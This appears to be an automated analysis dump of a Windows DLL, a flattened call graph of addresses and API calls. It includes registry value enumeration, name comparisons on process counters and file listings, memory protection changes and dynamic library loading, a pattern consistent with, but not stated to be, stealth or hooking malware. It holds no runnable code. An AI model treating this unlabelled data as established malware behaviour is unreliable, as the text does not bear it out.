8465->8467 8469 1780dd318a8 8465->8469 8470 1780dd317f4 8465->8470 8468 1780dd2f218 10 API calls 8466->8468 8466->8471 8467->8470 8468->8471 8469->8471 8472 1780dd2d2a0 __free_lconv_num 13 API calls 8469->8472 8470->8471 8473 1780dd2f218 10 API calls 8470->8473 8471->8454 8471->8459 8472->8471 8474 1780dd31874 8473->8474 8474->8469 8475 1780dd318aa 8474->8475 8476 1780dd31894 8474->8476 8477 1780dd2ece8 WideCharToMultiByte 8475->8477 8478 1780dd2ece8 WideCharToMultiByte 8476->8478 8479 1780dd318a2 8477->8479 8478->8479 8479->8469 8480 1780dd318c2 8479->8480 8480->8471 8481 1780dd2d2a0 __free_lconv_num 13 API calls 8480->8481 8481->8471 8483 1780dd2f244 8482->8483 8488 1780dd2f267 8482->8488 8485 1780dd2ef88 9 API calls 8483->8485 8486 1780dd2f26f 8483->8486 8485->8488 8486->8464 8487 1780dd2f2cd LCMapStringW 8487->8486 8488->8486 8489 1780dd2f30c 8488->8489 8490 1780dd2f328 8489->8490 8491 1780dd2f34a 8489->8491 8490->8491 8492 1780dd2ef88 9 API calls 8490->8492 8491->8487 8492->8491 7710 1780dd22e54 7712 1780dd22ea8 7710->7712 7711 1780dd22ec3 7712->7711 7714 1780dd237f4 7712->7714 7715 1780dd2388a 7714->7715 7718 1780dd23819 7714->7718 7715->7711 7716 1780dd23f88 StrCmpNIW 7716->7718 7717 1780dd21e08 StrCmpIW StrCmpW 7717->7718 7718->7715 7718->7716 7718->7717 9069 1780dd2b0d4 9076 1780dd2b007 __CxxCallCatchBlock __FrameHandler3::GetHandlerSearchState 9069->9076 9070 1780dd2b0fb 9071 1780dd29324 __CxxCallCatchBlock 9 API calls 9070->9071 9072 1780dd2b100 9071->9072 9073 1780dd29324 __CxxCallCatchBlock 9 API calls 9072->9073 9074 1780dd2b10b __FrameHandler3::GetHandlerSearchState 9072->9074 9073->9074 9075 1780dd299cc 9 API calls Is_bad_exception_allowed 9075->9076 9076->9070 9076->9074 9076->9075 9078 1780dd299f4 9076->9078 9079 1780dd29324 __CxxCallCatchBlock 9 API calls 9078->9079 9080 1780dd29a02 9079->9080 9080->9076 9081 1780dd234b8 9082 1780dd234e8 9081->9082 9083 1780dd235a1 9082->9083 9084 1780dd23505 PdhGetCounterInfoW 9082->9084 9084->9083 9085 1780dd23523 GetProcessHeap HeapAlloc PdhGetCounterInfoW 9084->9085 9086 1780dd2358d GetProcessHeap HeapFree 9085->9086 9087 1780dd23555 StrCmpW 9085->9087 9086->9083 9087->9086 9089 1780dd2356a 9087->9089 9088 1780dd23950 12 API calls 9088->9089 9089->9086 9089->9088 7468 1780dd21e3c LoadLibraryA GetProcAddress 7469 1780dd21e6f 7468->7469 7470 1780dd21e62 SleepEx 7468->7470 7470->7470 7719 1780dd2ae42 7720 1780dd29324 __CxxCallCatchBlock 9 API calls 7719->7720 7722 1780dd2ae4f __CxxCallCatchBlock 7720->7722 7721 1780dd2ae93 RaiseException 7723 1780dd2aeba 7721->7723 7722->7721 7732 1780dd29978 7723->7732 7726 1780dd29324 __CxxCallCatchBlock 9 API calls 7727 1780dd2aefe 7726->7727 7728 1780dd29324 __CxxCallCatchBlock 9 API calls 7727->7728 7729 1780dd2af07 7728->7729 7731 1780dd2aeeb __CxxCallCatchBlock 7731->7726 7733 1780dd29324 __CxxCallCatchBlock 9 API calls 7732->7733 7734 1780dd2998a 7733->7734 7735 1780dd299c5 7734->7735 7736 1780dd29324 __CxxCallCatchBlock 9 API calls 7734->7736 7737 1780dd29995 7736->7737 7737->7735 7738 1780dd29324 __CxxCallCatchBlock 9 API calls 7737->7738 7739 1780dd299b6 7738->7739 7739->7731 7740 1780dd28ff8 7739->7740 7741 1780dd29324 __CxxCallCatchBlock 9 API calls 7740->7741 7742 1780dd29006 7741->7742 7742->7731 8494 1780dd347c2 8495 1780dd29978 __CxxCallCatchBlock 9 API calls 8494->8495 8499 1780dd347d5 8495->8499 8496 1780dd34814 __CxxCallCatchBlock 8497 1780dd29324 __CxxCallCatchBlock 9 API calls 8496->8497 8498 1780dd34828 8497->8498 8500 1780dd29324 __CxxCallCatchBlock 9 API calls 8498->8500 8499->8496 8502 1780dd28ff8 __CxxCallCatchBlock 9 API calls 8499->8502 8501 1780dd34838 8500->8501 8502->8496 8503 1780dd281c0 8504 1780dd281c9 __scrt_release_startup_lock 8503->8504 8506 1780dd281cd 8504->8506 8507 1780dd2bbb4 8504->8507 8508 1780dd2bbd4 8507->8508 8535 1780dd2bbed 8507->8535 8509 1780dd2bbdc 8508->8509 8510 1780dd2bbf2 8508->8510 8511 1780dd2d1f4 __free_lconv_num 13 API calls 8509->8511 8512 1780dd2e864 56 API calls 8510->8512 8513 1780dd2bbe1 8511->8513 8514 1780dd2bbf7 8512->8514 8516 1780dd2d04c _invalid_parameter_noinfo 38 API calls 8513->8516 8536 1780dd2df38 GetModuleFileNameW 8514->8536 8516->8535 8520 1780dd2bb54 13 API calls 8521 1780dd2bc61 8520->8521 8522 1780dd2bc7a 8521->8522 8523 1780dd2bc69 8521->8523 8525 1780dd2b994 14 API calls 8522->8525 8524 1780dd2d1f4 __free_lconv_num 13 API calls 8523->8524 8526 1780dd2bc6e 8524->8526 8527 1780dd2bc96 8525->8527 8528 1780dd2d2a0 __free_lconv_num 13 API calls 8526->8528 8527->8526 8529 1780dd2bcdf 8527->8529 8530 1780dd2bcc6 8527->8530 8528->8535 8533 1780dd2d2a0 __free_lconv_num 13 API calls 8529->8533 8531 1780dd2d2a0 __free_lconv_num 13 API calls 8530->8531 8532 1780dd2bccf 8531->8532 8534 1780dd2d2a0 __free_lconv_num 13 API calls 8532->8534 8533->8526 8534->8535 8535->8506 8537 1780dd2df7d GetLastError 8536->8537 8538 1780dd2df91 8536->8538 8554 1780dd2d184 8537->8554 8540 1780dd2dd78 14 API calls 8538->8540 8541 1780dd2dfbf 8540->8541 8543 1780dd2f198 9 API calls 8541->8543 8546 1780dd2dfd0 8541->8546 8542 1780dd28070 _invalid_parameter_noinfo 8 API calls 8545 1780dd2bc0e 8542->8545 8543->8546 8548 1780dd2b994 8545->8548 8559 1780dd2de1c 8546->8559 8547 1780dd2df8a 8547->8542 8550 1780dd2b9d2 8548->8550 8552 1780dd2ba38 8550->8552 8576 1780dd2ec1c 8550->8576 8551 1780dd2bb25 8551->8520 8552->8551 8553 1780dd2ec1c 14 API calls 8552->8553 8553->8552 8573 1780dd2d1d0 8554->8573 8556 1780dd2d191 __free_lconv_num 8557 1780dd2d1f4 __free_lconv_num 13 API calls 8556->8557 8558 1780dd2d1a1 8557->8558 8558->8547 8560 1780dd2de5b 8559->8560 8561 1780dd2de40 8559->8561 8562 1780dd2ece8 WideCharToMultiByte 8560->8562 8563 1780dd2de60 8560->8563 8561->8547 8564 1780dd2deb7 8562->8564 8563->8561 8565 1780dd2d1f4 __free_lconv_num 13 API calls 8563->8565 8564->8563 8566 1780dd2debe GetLastError 8564->8566 8567 1780dd2dee9 8564->8567 8565->8561 8568 1780dd2d184 13 API calls 8566->8568 8569 1780dd2ece8 WideCharToMultiByte 8567->8569 8570 1780dd2decb 8568->8570 8572 1780dd2df10 8569->8572 8571 1780dd2d1f4 __free_lconv_num 13 API calls 8570->8571 8571->8561 8572->8561 8572->8566 8574 1780dd2cb10 __free_lconv_num 13 API calls 8573->8574 8575 1780dd2d1d9 8574->8575 8575->8556 8577 1780dd2eba8 8576->8577 8578 1780dd2dd78 14 API calls 8577->8578 8579 1780dd2ebcc 8578->8579 8579->8550 7743 1780dd2f440 GetProcessHeap 8803 1780dd2ff40 8804 1780dd2ff4b 8803->8804 8812 1780dd32c24 8804->8812 8825 1780dd2c558 EnterCriticalSection 8812->8825 7471 1780dd21bc4 7478 1780dd21724 GetProcessHeap HeapAlloc 7471->7478 7473 1780dd21bd3 7474 1780dd21bda SleepEx 7473->7474 7477 1780dd2159c StrCmpIW StrCmpW 7473->7477 7529 1780dd219b0 7473->7529 7475 1780dd21724 50 API calls 7474->7475 7475->7473 7477->7473 7546 1780dd21264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7478->7546 7480 1780dd2174c 7547 1780dd21000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7480->7547 7482 1780dd21754 7548 1780dd21264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7482->7548 7484 1780dd2175d 7549 1780dd21264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7484->7549 7486 1780dd21766 7550 1780dd21264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7486->7550 7488 1780dd2176f 7551 1780dd21000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7488->7551 7490 1780dd21778 7552 1780dd21000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7490->7552 7492 1780dd21781 7553 1780dd21000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7492->7553 7494 1780dd2178a RegOpenKeyExW 7495 1780dd217bc RegOpenKeyExW 7494->7495 7496 1780dd219a2 7494->7496 7497 1780dd217fb RegOpenKeyExW 7495->7497 7498 1780dd217e5 7495->7498 7496->7473 7500 1780dd2181f 7497->7500 7501 1780dd21836 RegOpenKeyExW 7497->7501 7554 1780dd212b8 RegQueryInfoKeyW 7498->7554 7563 1780dd2104c RegQueryInfoKeyW 7500->7563 7504 1780dd2185a 7501->7504 7505 1780dd21871 RegOpenKeyExW 7501->7505 7507 1780dd212b8 16 API calls 7504->7507 7508 1780dd218ac RegOpenKeyExW 7505->7508 7509 1780dd21895 7505->7509 7513 1780dd21867 RegCloseKey 7507->7513 7511 1780dd218d0 7508->7511 7512 1780dd218e7 RegOpenKeyExW 7508->7512 7510 1780dd212b8 16 API calls 7509->7510 7514 1780dd218a2 RegCloseKey 7510->7514 7515 1780dd212b8 16 API calls 7511->7515 7516 1780dd2190b 7512->7516 7517 1780dd21922 RegOpenKeyExW 7512->7517 7513->7505 7514->7508 7518 1780dd218dd RegCloseKey 7515->7518 7519 1780dd2104c 6 API calls 7516->7519 7520 1780dd2195d RegOpenKeyExW 7517->7520 7521 1780dd21946 7517->7521 7518->7512 7522 1780dd21918 RegCloseKey 7519->7522 7524 1780dd21998 RegCloseKey 7520->7524 7525 1780dd21981 7520->7525 7523 1780dd2104c 6 API calls 7521->7523 7522->7517 7527 1780dd21953 RegCloseKey 7523->7527 7524->7496 7526 1780dd2104c 6 API calls 7525->7526 7528 1780dd2198e RegCloseKey 7526->7528 7527->7520 7528->7524 7573 1780dd214a0 7529->7573 7546->7480 7547->7482 7548->7484 7549->7486 7550->7488 7551->7490 7552->7492 7553->7494 7555 1780dd21323 GetProcessHeap HeapAlloc 7554->7555 7556 1780dd21486 RegCloseKey 7554->7556 7557 1780dd2134e RegEnumValueW 7555->7557 7558 1780dd21472 GetProcessHeap HeapFree 7555->7558 7556->7497 7559 1780dd213a1 7557->7559 7558->7556 7559->7557 7559->7558 7561 1780dd2141a lstrlenW GetProcessHeap HeapAlloc StrCpyW 7559->7561 7562 1780dd213cf GetProcessHeap HeapAlloc GetProcessHeap HeapFree 7559->7562 7568 1780dd21530 7559->7568 7561->7559 7562->7561 7564 1780dd211b5 RegCloseKey 7563->7564 7566 1780dd210bf 7563->7566 7564->7501 7565 1780dd210cf RegEnumValueW 7565->7566 7566->7564 7566->7565 7567 1780dd2114e GetProcessHeap HeapAlloc GetProcessHeap HeapFree 7566->7567 7567->7566 7569 1780dd21580 7568->7569 7572 1780dd2154a 7568->7572 7569->7559 7570 1780dd21569 StrCmpW 7570->7572 7571 1780dd21561 StrCmpIW 7571->7572 7572->7569 7572->7570 7572->7571 7574 1780dd214e2 GetProcessHeap HeapFree GetProcessHeap HeapFree 7573->7574 7575 1780dd214c2 GetProcessHeap HeapFree 7573->7575 7575->7574 7575->7575 8580 1780dd2b7ea 8581 1780dd2c2f4 14 API calls 8580->8581 8582 1780dd2b7ef 8581->8582 8583 1780dd2b85f 8582->8583 8584 1780dd2b815 GetModuleHandleW 8582->8584 8597 1780dd2b6f8 8583->8597 8584->8583 8587 1780dd2b822 8584->8587 8587->8583 8592 1780dd2b904 GetModuleHandleExW 8587->8592 8593 1780dd2b938 GetProcAddress 8592->8593 8594 1780dd2b94a 8592->8594 8593->8594 8595 1780dd2b95b FreeLibrary 8594->8595 8596 1780dd2b962 8594->8596 8595->8596 8596->8583 8609 1780dd2c558 EnterCriticalSection 8597->8609 8610 1780dd227e8 8611 1780dd22867 8610->8611 8612 1780dd228c9 GetFileType 8611->8612 8624 1780dd22998 8611->8624 8613 1780dd228ed 8612->8613 8614 1780dd228d7 StrCpyW 8612->8614 8626 1780dd21ad4 GetFinalPathNameByHandleW 8613->8626 8615 1780dd228fc 8614->8615 8618 1780dd22906 8615->8618 8620 1780dd2299d 8615->8620 8617 1780dd23f88 StrCmpNIW 8617->8620 8618->8624 8631 1780dd23f88 8618->8631 8634 1780dd23708 StrCmpIW 8618->8634 8638 1780dd21dd4 8618->8638 8620->8617 8621 1780dd23708 4 API calls 8620->8621 8622 1780dd21dd4 2 API calls 8620->8622 8620->8624 8621->8620 8622->8620 8627 1780dd21afe StrCmpNIW 8626->8627 8628 1780dd21b3d 8626->8628 8627->8628 8629 1780dd21b18 lstrlenW 8627->8629 8628->8615 8629->8628 8630 1780dd21b2a StrCpyW 8629->8630 8630->8628 8632 1780dd23faa 8631->8632 8633 1780dd23f95 StrCmpNIW 8631->8633 8632->8618 8633->8632 8635 1780dd2373a StrCpyW StrCatW 8634->8635 8636 1780dd23751 PathCombineW 8634->8636 8637 1780dd2375a 8635->8637 8636->8637 8637->8618 8639 1780dd21deb 8638->8639 8640 1780dd21df4 8638->8640 8641 1780dd21530 2 API calls 8639->8641 8640->8618 8641->8640 7744 1780dd28672 7747 1780dd290c0 7744->7747 7746 1780dd2869d 7748 1780dd29116 7747->7748 7749 1780dd290e1 7747->7749 7748->7746 7749->7748 7751 1780dd2c328 7749->7751 7752 1780dd2c33f 7751->7752 7753 1780dd2c335 7751->7753 7754 1780dd2d1f4 __free_lconv_num 13 API calls 7752->7754 7753->7752 7757 1780dd2c35a 7753->7757 7759 1780dd2c346 7754->7759 7756 1780dd2c352 7756->7748 7757->7756 7758 1780dd2d1f4 __free_lconv_num 13 API calls 7757->7758 7758->7759 7760 1780dd2d04c 7759->7760 7763 1780dd2cef8 7760->7763 7764 1780dd2cf23 7763->7764 7771 1780dd2cf94 7764->7771 7766 1780dd2cf4a 7767 1780dd2cf6d 7766->7767 7781 1780dd2c3e0 7766->7781 7769 1780dd2c3e0 _invalid_parameter_noinfo 17 API calls 7767->7769 7770 1780dd2cf82 7767->7770 7769->7770 7770->7756 7794 1780dd2ccc8 7771->7794 7776 1780dd2cfcf 7776->7766 7782 1780dd2c438 7781->7782 7783 1780dd2c3ef GetLastError 7781->7783 7782->7767 7784 1780dd2c404 7783->7784 7785 1780dd2cba0 _invalid_parameter_noinfo 14 API calls 7784->7785 7786 1780dd2c41e SetLastError 7785->7786 7786->7782 7787 1780dd2c441 7786->7787 7788 1780dd2c3e0 _invalid_parameter_noinfo 15 API calls 7787->7788 7789 1780dd2c467 7788->7789 7834 1780dd2ffe8 7789->7834 7795 1780dd2cd1f 7794->7795 7796 1780dd2cce4 GetLastError 7794->7796 7795->7776 7800 1780dd2cd34 7795->7800 7797 1780dd2ccf4 7796->7797 7807 1780dd2cba0 7797->7807 7801 1780dd2cd68 7800->7801 7802 1780dd2cd50 GetLastError SetLastError 7800->7802 7801->7776 7803 1780dd2d06c IsProcessorFeaturePresent 7801->7803 7802->7801 7804 1780dd2d07f 7803->7804 7812 1780dd2cd80 7804->7812 7808 1780dd2cbc8 FlsGetValue 7807->7808 7810 1780dd2cbc4 7807->7810 7808->7810 7809 1780dd2cbde SetLastError 7809->7795 7810->7809 7811 1780dd2c940 _invalid_parameter_noinfo 13 API calls 7810->7811 7811->7809 7813 1780dd2cdba _invalid_parameter_noinfo 7812->7813 7814 1780dd2cde2 RtlCaptureContext RtlLookupFunctionEntry 7813->7814 7815 1780dd2ce2e RtlVirtualUnwind 7814->7815 7816 1780dd2ce64 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 7814->7816 7815->7816 7817 1780dd2ceb6 _invalid_parameter_noinfo 7816->7817 7820 1780dd28070 7817->7820 7821 1780dd28079 7820->7821 7822 1780dd28848 IsProcessorFeaturePresent 7821->7822 7823 1780dd28084 GetCurrentProcess TerminateProcess 7821->7823 7824 1780dd28860 7822->7824 7829 1780dd2891c RtlCaptureContext 7824->7829 7830 1780dd28936 RtlLookupFunctionEntry 7829->7830 7831 1780dd2894c RtlVirtualUnwind 7830->7831 7832 1780dd28873 7830->7832 7831->7830 7831->7832 7833 1780dd28814 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 7832->7833 7835 1780dd30001 7834->7835 7836 1780dd2c48f 7834->7836 7835->7836 7842 1780dd30a40 7835->7842 7838 1780dd30054 7836->7838 7839 1780dd3006d 7838->7839 7840 1780dd2c49f 7838->7840 7839->7840 7852 1780dd2e8c4 7839->7852 7840->7767 7843 1780dd2cab0 _invalid_parameter_noinfo 14 API calls 7842->7843 7844 1780dd30a4f 7843->7844 7850 1780dd30a95 7844->7850 7851 1780dd2c558 EnterCriticalSection 7844->7851 7850->7836 7853 1780dd2cab0 _invalid_parameter_noinfo 14 API calls 7852->7853 7854 1780dd2e8cd 7853->7854 8642 1780dd22ff0 8643 1780dd23061 8642->8643 8644 1780dd23384 8643->8644 8645 1780dd2308d GetModuleHandleA 8643->8645 8646 1780dd2309f GetProcAddress 8645->8646 8647 1780dd230b1 8645->8647 8646->8647 8647->8644 8648 1780dd230d8 StrCmpNIW 8647->8648 8648->8644 8654 1780dd230fd 8648->8654 8649 1780dd21a30 6 API calls 8649->8654 8650 1780dd2320f lstrlenW 8650->8654 8651 1780dd232b9 lstrlenW 8651->8654 8652 1780dd21cfc StrCmpIW StrCmpW 8652->8654 8653 1780dd23f88 StrCmpNIW 8653->8654 8654->8644 8654->8649 8654->8650 8654->8651 8654->8652 8654->8653 7855 1780dd2f870 7857 1780dd2f8c7 7855->7857 7858 1780dd2f8a0 7855->7858 7856 1780dd2cb10 __free_lconv_num 13 API calls 7863 1780dd2f8b4 7856->7863 7859 1780dd2f99c 7857->7859 7878 1780dd2c558 EnterCriticalSection 7857->7878 7858->7856 7858->7857 7858->7863 7862 1780dd2fab3 7859->7862 7865 1780dd2fa03 7859->7865 7871 1780dd2f9ca 7859->7871 7860 1780dd2f904 7866 1780dd2fac0 7862->7866 7880 1780dd2c5ac LeaveCriticalSection 7862->7880 7863->7857 7863->7860 7864 1780dd2f949 7863->7864 7867 1780dd2d1f4 __free_lconv_num 13 API calls 7864->7867 7875 1780dd2fa61 7865->7875 7879 1780dd2c5ac LeaveCriticalSection 7865->7879 7870 1780dd2f94e 7867->7870 7872 1780dd2d04c _invalid_parameter_noinfo 38 API calls 7870->7872 7871->7865 7873 1780dd2cab0 _invalid_parameter_noinfo 14 API calls 7871->7873 7872->7860 7874 1780dd2f9f3 7873->7874 7876 1780dd2cab0 _invalid_parameter_noinfo 14 API calls 7874->7876 7877 1780dd2cab0 14 API calls _invalid_parameter_noinfo 7875->7877 7876->7865 7877->7875 8826 1780dd2f370 VirtualProtect 8827 1780dd25974 8828 1780dd2597a 8827->8828 8839 1780dd27fa0 8828->8839 8833 1780dd25a77 8835 1780dd25bfd 8833->8835 8838 1780dd259de 8833->8838 8852 1780dd27b80 8833->8852 8834 1780dd25cfb 8835->8834 8836 1780dd25d77 VirtualProtect 8835->8836 8837 1780dd25da3 GetLastError 8836->8837 8836->8838 8837->8838 8840 1780dd27fab 8839->8840 8841 1780dd259bd 8840->8841 8842 1780dd2b470 _invalid_parameter_noinfo 2 API calls 8840->8842 8843 1780dd27fca 8840->8843 8841->8838 8848 1780dd24400 8841->8848 8842->8840 8844 1780dd27fd5 8843->8844 8858 1780dd287b8 8843->8858 8862 1780dd287d8 8844->8862 8849 1780dd2441d 8848->8849 8851 1780dd2448c 8849->8851 8871 1780dd24670 8849->8871 8851->8833 8853 1780dd27bc7 8852->8853 8896 1780dd27950 8853->8896 8856 1780dd28070 _invalid_parameter_noinfo 8 API calls 8857 1780dd27bf1 8856->8857 8857->8833 8859 1780dd287c6 std::bad_alloc::bad_alloc 8858->8859 8866 1780dd29178 8859->8866 8861 1780dd287d7 8863 1780dd287e6 std::bad_alloc::bad_alloc 8862->8863 8864 1780dd29178 Concurrency::cancel_current_task 2 API calls 8863->8864 8865 1780dd27fdb 8864->8865 8867 1780dd29197 8866->8867 8868 1780dd291e2 RaiseException 8867->8868 8869 1780dd291c0 RtlPcToFileHeader 8867->8869 8868->8861 8870 1780dd291d8 8869->8870 8870->8868 8872 1780dd246b7 8871->8872 8873 1780dd24694 8871->8873 8874 1780dd246ed 8872->8874 8891 1780dd24250 8872->8891 8873->8872 8885 1780dd24120 8873->8885 8877 1780dd24250 2 API calls 8874->8877 8878 1780dd2471d 8874->8878 8877->8878 8879 1780dd24753 8878->8879 8882 1780dd24120 3 API calls 8878->8882 8880 1780dd2476f 8879->8880 8883 1780dd24120 3 API calls 8879->8883 8881 1780dd2478b 8880->8881 8884 1780dd24250 2 API calls 8880->8884 8881->8851 8882->8879 8883->8880 8884->8881 8888 1780dd24141 8885->8888 8886 1780dd241b0 8886->8872 8887 1780dd24196 VirtualQuery 8887->8886 8887->8888 8888->8886 8888->8887 8889 1780dd241ca VirtualAlloc 8888->8889 8889->8886 8890 1780dd241fb GetLastError 8889->8890 8890->8888 8893 1780dd24268 8891->8893 8892 1780dd242bd VirtualQuery 8892->8893 8894 1780dd242d7 8892->8894 8893->8892 8893->8894 8895 1780dd24322 GetLastError 8893->8895 8894->8874 8895->8893 8897 1780dd2796b 8896->8897 8898 1780dd2798f 8897->8898 8899 1780dd27981 SetLastError 8897->8899 8898->8856 8899->8898 9093 1780dd346f5 9094 1780dd29324 __CxxCallCatchBlock 9 API calls 9093->9094 9095 1780dd3470d 9094->9095 9096 1780dd29324 __CxxCallCatchBlock 9 API calls 9095->9096 9097 1780dd34728 9096->9097 9098 1780dd29324 __CxxCallCatchBlock 9 API calls 9097->9098 9099 1780dd3473c 9098->9099 9100 1780dd29324 __CxxCallCatchBlock 9 API calls 9099->9100 9101 1780dd3477e 9100->9101 8655 1780dd2c1d8 8656 1780dd2c209 8655->8656 8657 1780dd2c1f1 8655->8657 8657->8656 8658 1780dd2d2a0 __free_lconv_num 13 API calls 8657->8658 8658->8656 9102 1780dd22ed8 9104 1780dd22f35 9102->9104 9103 1780dd22f50 9104->9103 9105 1780dd238a8 3 API calls 9104->9105 9105->9103 7881 1780dd2d658 7882 1780dd2d67d 7881->7882 7883 1780dd2d694 7881->7883 7884 1780dd2d1f4 __free_lconv_num 13 API calls 7882->7884 7890 1780dd2d724 7883->7890 7897 1780dd2d7b6 7883->7897 7899 1780dd2d6da 7883->7899 7914 1780dd2d894 7883->7914 7976 1780dd2da18 7883->7976 7885 1780dd2d682 7884->7885 7886 1780dd2d04c _invalid_parameter_noinfo 38 API calls 7885->7886 7889 1780dd2d68d 7886->7889 8013 1780dd2bb54 7890->8013 7891 1780dd2d784 7895 1780dd2d2a0 __free_lconv_num 13 API calls 7891->7895 7894 1780dd2d836 7898 1780dd2d2a0 __free_lconv_num 13 API calls 7894->7898 7896 1780dd2d78b 7895->7896 7900 1780dd2d6fd 7896->7900 7904 1780dd2d2a0 __free_lconv_num 13 API calls 7896->7904 7897->7900 7907 1780dd2d2a0 __free_lconv_num 13 API calls 7897->7907 7902 1780dd2d841 7898->7902 7899->7900 7903 1780dd2d2a0 __free_lconv_num 13 API calls 7899->7903 7905 1780dd2d2a0 __free_lconv_num 13 API calls 7900->7905 7901 1780dd2d7d7 7901->7894 7901->7901 7911 1780dd2d87c 7901->7911 8019 1780dd30eb8 7901->8019 7906 1780dd2d85a 7902->7906 7909 1780dd2d2a0 __free_lconv_num 13 API calls 7902->7909 7903->7899 7904->7896 7905->7889 7910 1780dd2d2a0 __free_lconv_num 13 API calls 7906->7910 7907->7897 7909->7902 7910->7889 7912 1780dd2d06c _invalid_parameter_noinfo 17 API calls 7911->7912 7913 1780dd2d891 7912->7913 7915 1780dd2d8c2 7914->7915 7915->7915 7916 1780dd2d8de 7915->7916 7917 1780dd2d220 _invalid_parameter_noinfo 13 API calls 7915->7917 7916->7883 7918 1780dd2d90d 7917->7918 7919 1780dd2d926 7918->7919 7920 1780dd30eb8 38 API calls 7918->7920 7921 1780dd30eb8 38 API calls 7919->7921 7923 1780dd2d9fc 7919->7923 7920->7919 7922 1780dd2d943 7921->7922 7922->7923 7925 1780dd2d98d 7922->7925 7926 1780dd2d962 7922->7926 7935 1780dd2d97f 7922->7935 7924 1780dd2d06c _invalid_parameter_noinfo 17 API calls 7923->7924 7927 1780dd2da17 7924->7927 7930 1780dd2d977 7925->7930 8028 1780dd2eee0 7925->8028 7928 1780dd2d220 _invalid_parameter_noinfo 13 API calls 7926->7928 7932 1780dd2da7a 7927->7932 8037 1780dd313d8 7927->8037 7933 1780dd2d96d 7928->7933 7929 1780dd2d2a0 __free_lconv_num 13 API calls 7929->7923 7931 1780dd2d2a0 __free_lconv_num 13 API calls 7930->7931 7930->7935 7931->7935 7939 1780dd2da8c 7932->7939 7944 1780dd2daa1 7932->7944 7936 1780dd2d2a0 __free_lconv_num 13 API calls 7933->7936 7935->7929 7936->7930 7937 1780dd2d9b5 7940 1780dd2d9ba 7937->7940 7941 1780dd2d9d0 7937->7941 7943 1780dd2d894 52 API calls 7939->7943 7945 1780dd2d2a0 __free_lconv_num 13 API calls 7940->7945 7942 1780dd2d2a0 __free_lconv_num 13 API calls 7941->7942 7942->7935 7946 1780dd2da9c 7943->7946 8046 1780dd2dd78 7944->8046 7945->7930 7948 1780dd28070 _invalid_parameter_noinfo 8 API calls 7946->7948 7950 1780dd2dd64 7948->7950 7950->7883 7951 1780dd2db1a 8058 1780dd2d30c 7951->8058 7955 1780dd2dba8 7956 1780dd2d894 52 API calls 7955->7956 7957 1780dd2dbb8 7956->7957 7957->7946 7959 1780dd2d2a0 __free_lconv_num 13 API calls 7957->7959 7958 1780dd2dd78 14 API calls 7969 1780dd2dbd2 7958->7969 7959->7946 7960 1780dd2f198 9 API calls 7960->7969 7962 1780dd2d894 52 API calls 7962->7969 7963 1780dd2dcc8 FindNextFileW 7965 1780dd2dce0 7963->7965 7963->7969 7964 1780dd2dd2a 7967 1780dd2dd38 FindClose 7964->7967 7970 1780dd2d2a0 __free_lconv_num 13 API calls 7964->7970 7968 1780dd2dd0c FindClose 7965->7968 8102 1780dd30b20 7965->8102 7966 1780dd2d2a0 13 API calls __free_lconv_num 7966->7969 7967->7946 7971 1780dd2dd48 7967->7971 7968->7946 7973 1780dd2dd1c 7968->7973 7969->7958 7969->7960 7969->7962 7969->7963 7969->7964 7969->7966 8080 1780dd2d4ac 7969->8080 7970->7967 7974 1780dd2d2a0 __free_lconv_num 13 API calls 7971->7974 7975 1780dd2d2a0 __free_lconv_num 13 API calls 7973->7975 7974->7946 7975->7946 7977 1780dd2da7a 7976->7977 7978 1780dd2da58 7976->7978 7980 1780dd2da8c 7977->7980 7983 1780dd2daa1 7977->7983 7978->7977 7979 1780dd313d8 38 API calls 7978->7979 7979->7978 7981 1780dd2d894 56 API calls 7980->7981 7982 1780dd2da9c 7981->7982 7985 1780dd28070 _invalid_parameter_noinfo 8 API calls 7982->7985 7984 1780dd2dd78 14 API calls 7983->7984 7986 1780dd2db0b 7984->7986 7987 1780dd2dd64 7985->7987 7988 1780dd2f198 9 API calls 7986->7988 7989 1780dd2db1a 7986->7989 7987->7883 7988->7989 7990 1780dd2d30c 16 API calls 7989->7990 7991 1780dd2db7b FindFirstFileExW 7990->7991 7992 1780dd2dba8 7991->7992 8006 1780dd2dbd2 7991->8006 7993 1780dd2d894 56 API calls 7992->7993 7994 1780dd2dbb8 7993->7994 7994->7982 7996 1780dd2d2a0 __free_lconv_num 13 API calls 7994->7996 7995 1780dd2dd78 14 API calls 7995->8006 7996->7982 7997 1780dd2f198 9 API calls 7997->8006 7998 1780dd2d4ac 16 API calls 7998->8006 7999 1780dd2d894 56 API calls 7999->8006 8000 1780dd2dcc8 FindNextFileW 8002 1780dd2dce0 8000->8002 8000->8006 8001 1780dd2dd2a 8004 1780dd2dd38 FindClose 8001->8004 8007 1780dd2d2a0 __free_lconv_num 13 API calls 8001->8007 8005 1780dd2dd0c FindClose 8002->8005 8009 1780dd30b20 38 API calls 8002->8009 8003 1780dd2d2a0 13 API calls __free_lconv_num 8003->8006 8004->7982 8008 1780dd2dd48 8004->8008 8005->7982 8010 1780dd2dd1c 8005->8010 8006->7995 8006->7997 8006->7998 8006->7999 8006->8000 8006->8001 8006->8003 8007->8004 8011 1780dd2d2a0 __free_lconv_num 13 API calls 8008->8011 8009->8005 8012 1780dd2d2a0 __free_lconv_num 13 API calls 8010->8012 8011->7982 8012->7982 8014 1780dd2bba4 8013->8014 8015 1780dd2bb6c 8013->8015 8014->7891 8014->7901 8015->8014 8016 1780dd2d220 _invalid_parameter_noinfo 13 API calls 8015->8016 8017 1780dd2bb9a 8016->8017 8018 1780dd2d2a0 __free_lconv_num 13 API calls 8017->8018 8018->8014 8022 1780dd30ed5 8019->8022 8020 1780dd30eda 8021 1780dd2d1f4 __free_lconv_num 13 API calls 8020->8021 8025 1780dd30ef0 8020->8025 8027 1780dd30ee4 8021->8027 8022->8020 8023 1780dd30f24 8022->8023 8022->8025 8023->8025 8026 1780dd2d1f4 __free_lconv_num 13 API calls 8023->8026 8024 1780dd2d04c _invalid_parameter_noinfo 38 API calls 8024->8025 